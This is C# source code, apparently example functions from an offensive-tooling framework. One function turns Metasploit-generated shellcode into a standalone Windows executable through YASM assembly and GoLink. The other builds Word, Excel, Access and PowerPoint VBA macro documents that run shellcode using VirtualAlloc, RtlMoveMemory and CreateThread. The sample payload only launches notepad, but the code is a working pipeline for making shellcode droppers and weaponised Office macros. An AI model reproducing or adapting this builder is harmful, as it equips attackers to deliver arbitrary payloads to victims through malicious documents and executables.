// Assembly Example with shellcode using Yasm + GoLink
private static IAttack AssemblyShellcodeYasmGoLinkExample()
{
var samplesOutput = new SamplesOutput();
var attackName = "AssemblyShellcodeYasmGoLink";
var attack = new Attack(new IOutput[] {
samplesOutput,
}, name: attackName);
// Metasploit payloads can be easily generated
var shellcodeBytes = MetasploitPayloadFactory.Generate(format: "raw", payload: "windows/x64/exec", options: "EXITFUNC=thread CMD=notepad");
// They'll need to be wrapped in the appropriate Class.
var shellcode = new ShellcodeX64(shellcodeBytes);
// This is YASM Assembly Langauge that includes the shellcode instructions as-is
var rawShellcodeAsm = new RawShellcodeYasmAssemblySource(
shellcode,
symbolName: "SheSellsShellCodesByTheSilkRoad", // A label for the start of the shellcode. Can be called like a function from C
sectionWritable: true // Some shellcode needs to be in a memory page that has RWX permissions. This not one of them, but lets give the section Write permissions anyways
);
var staticLibrary = ((IAssembler <YASM, Win64ObjectFile>) new MyWarez.Plugins.Yasm.Yasm()).Assemble(rawShellcodeAsm);
var entryPoint = ((ICFunction)rawShellcodeAsm).Name;
var linkerConfig = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: entryPoint);
var createProcessExe = ((ILinker <Win64ObjectFile, Executable>) new MyWarez.Plugins.GoDevTool.Linker(linkerConfig)).Link(staticLibrary);
samplesOutput.Add("AssemblyShellcodeYasmGoLinkNotepad.exe", createProcessExe); // Double click to confirm that notepad spawns
// Note: Linking with MSVC instead of GoLink would also be an option
attack.Generate();
return(attack);
}
// Office VBAMacro Example
private static IAttack OfficeVbaMacroExample()
{
var samplesOutput = new SamplesOutput();
var attackName = "OfficeVbaMacro";
var attack = new Attack(new IOutput[] {
samplesOutput,
}, name: attackName);
var shellcodeBytes = MetasploitPayloadFactory.Generate(format: "raw", payload: "windows/exec", options: "EXITFUNC=thread CMD=notepad");
// Most installs of Microsft Office are 32 bit
var shellcode = new ShellcodeX86(shellcodeBytes);
// VbaMacro that uses VirtualAlloc + RtlMoveMemory + CreateThread to execute shellcode
var vbaMacro = new ShellcodeVbaMacro(shellcode);
var wordVbaMacro = new WordVBAMacro(vbaMacro);
var wordVbaMacroFilename = "WordVbaMacro" + "." + wordVbaMacro.Extension;
samplesOutput.Add(wordVbaMacroFilename, wordVbaMacro);
var excelVbaMacro = new ExcelVBAMacro(vbaMacro);
var excelVbaMacroFilename = "ExcelVbaMacro" + "." + excelVbaMacro.Extension;
samplesOutput.Add(excelVbaMacroFilename, excelVbaMacro);
var accessVbaMacro = new AccessVBAMacro(vbaMacro);
var accessVbaMacroFilename = "AccessVbaMacro" + "." + accessVbaMacro.Extension;
samplesOutput.Add(accessVbaMacroFilename, accessVbaMacro);
var powerPointVbaMacro = new PowerPointVBAMacro(vbaMacro);
var powerPointVbaMacroFilename = "PowerPointVbaMacro" + "." + powerPointVbaMacro.Extension;
samplesOutput.Add(powerPointVbaMacroFilename, powerPointVbaMacro);
attack.Generate();
return(attack);
}
